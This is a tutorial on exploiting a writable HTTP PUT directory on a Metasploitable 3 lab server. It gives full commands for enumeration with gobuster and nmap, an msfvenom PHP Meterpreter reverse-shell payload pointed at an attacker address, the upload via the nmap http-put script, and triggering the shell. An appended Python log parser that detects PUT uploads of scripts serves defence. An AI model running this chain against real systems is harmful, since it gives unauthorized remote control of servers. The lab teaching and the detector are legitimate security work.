In this tutorial, we will exploit the HTTP PUT method to upload a malicious PHP file that creates a Meterpreter reverse shell.
The target system is Metasploitable 3, and the service is the HTTP server on port 8585.
Directory Enumeration
First, let’s run a gobuster scan on port 8585 to find any directories that may be vulnerable.
gobuster -u http://192.168.2.66:8585 -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-small.txt -t 40
After the gobuster scan, let’s look at the HTTP methods allowed in the directories that were discovered.
HTTP Methods
Now that we have a list of directories, let’s use the nmap http-methods script to see which HTTP methods this directory accepts.
nmap -p 8585 -sV --script http-methods,http-trace --script-args http-methods.test-all=true,http-methods.url-path='/uploads/' 192.168.2.66
After running the http-methods nmap script against the “uploads” directory, we can see that the PUT method is vulnerable.
Payload build – MSFVenom
Since the “uploads” directory is vulnerable to HTTP PUT, let’s build a PHP payload using MSFVenom.
msfvenom -p php/meterpreter_reverse_tcp lhost=192.168.2.60 lport=4444 -f raw > phpexploit.php
Using MSFVenom I’ve created a PHP payload that will initiate a Meterpreter reverse TCP shell.
NMAP HTTP-PUT
nmap --script http-put --script-args http-put.url='/uploads/shell.php',http-put.file='/root/phpexploit.php' -p 8585 192.168.2.66 -sV
Using the http-put script, I was able to load the MSFVenom PHP payload into the “uploads” directory.
Metasploit handler
We now have the handler set up using the multi handler exploit with a PHP Meterpreter reverse TCP payload.
Exploitation
Now that we have everything set up, all we need to do is click on the PHP file in the “uploads” directory.
After clicking on the PHP payload, we now have a reverse Meterpreter shell on the remote server.
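From the defender's side, the steps above leave a recognisable trace in the web server's access log: a successful PUT of a script file, followed by a request for the same path. The following is an added example, not part of the original tutorial, that flags this pattern; it assumes Apache common/combined log format, and the log lines (timestamps and the 192.168.2.77 client included) are constructed.

```python
import re
from typing import NamedTuple

# Assumed format (Apache common/combined):
# host ident user [time] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
SCRIPT_EXT = (".php", ".phtml", ".php5", ".jsp", ".asp", ".aspx")


class Finding(NamedTuple):
    path: str          # lower-cased request path, query string removed
    uploader: str      # client that issued the PUT
    upload_time: str
    executed_by: list  # clients that later requested the uploaded file


def find_put_uploads(lines):
    """Flag script files created by a successful PUT and record later requests for them."""
    uploads = {}  # path -> Finding
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip malformed or non-request lines
        path = m["path"].split("?", 1)[0].lower()
        ok = m["status"].startswith("2")  # 200/201/204 mean the request succeeded
        if m["method"] == "PUT" and ok and path.endswith(SCRIPT_EXT):
            uploads[path] = Finding(path, m["host"], m["time"], [])
        elif m["method"] in ("GET", "POST") and ok and path in uploads:
            uploads[path].executed_by.append(m["host"])
    return list(uploads.values())


# Constructed sample log lines; target path and attacker address follow the tutorial.
SAMPLE_LOG = """\
192.168.2.60 - - [10/Jan/2019:10:01:02 +0000] "GET /uploads/ HTTP/1.1" 200 1024
192.168.2.60 - - [10/Jan/2019:10:02:10 +0000] "OPTIONS /uploads/ HTTP/1.1" 200 0
192.168.2.60 - - [10/Jan/2019:10:03:44 +0000] "PUT /uploads/shell.php HTTP/1.1" 201 0
192.168.2.77 - - [10/Jan/2019:10:04:00 +0000] "PUT /uploads/notes.txt HTTP/1.1" 201 0
192.168.2.77 - - [10/Jan/2019:10:04:30 +0000] "PUT /private/x.php HTTP/1.1" 405 230
192.168.2.60 - - [10/Jan/2019:10:05:12 +0000] "GET /uploads/shell.php HTTP/1.1" 200 0
""".splitlines()

if __name__ == "__main__":
    for f in find_put_uploads(SAMPLE_LOG):
        state = "requested by " + ", ".join(f.executed_by) if f.executed_by else "not yet requested"
        print(f"ALERT {f.path} uploaded via PUT by {f.uploader} at {f.upload_time}; {state}")
```

A finding with a non-empty `executed_by` list means the uploaded script was actually served, which is the point at which the reverse shell in this walkthrough connects back.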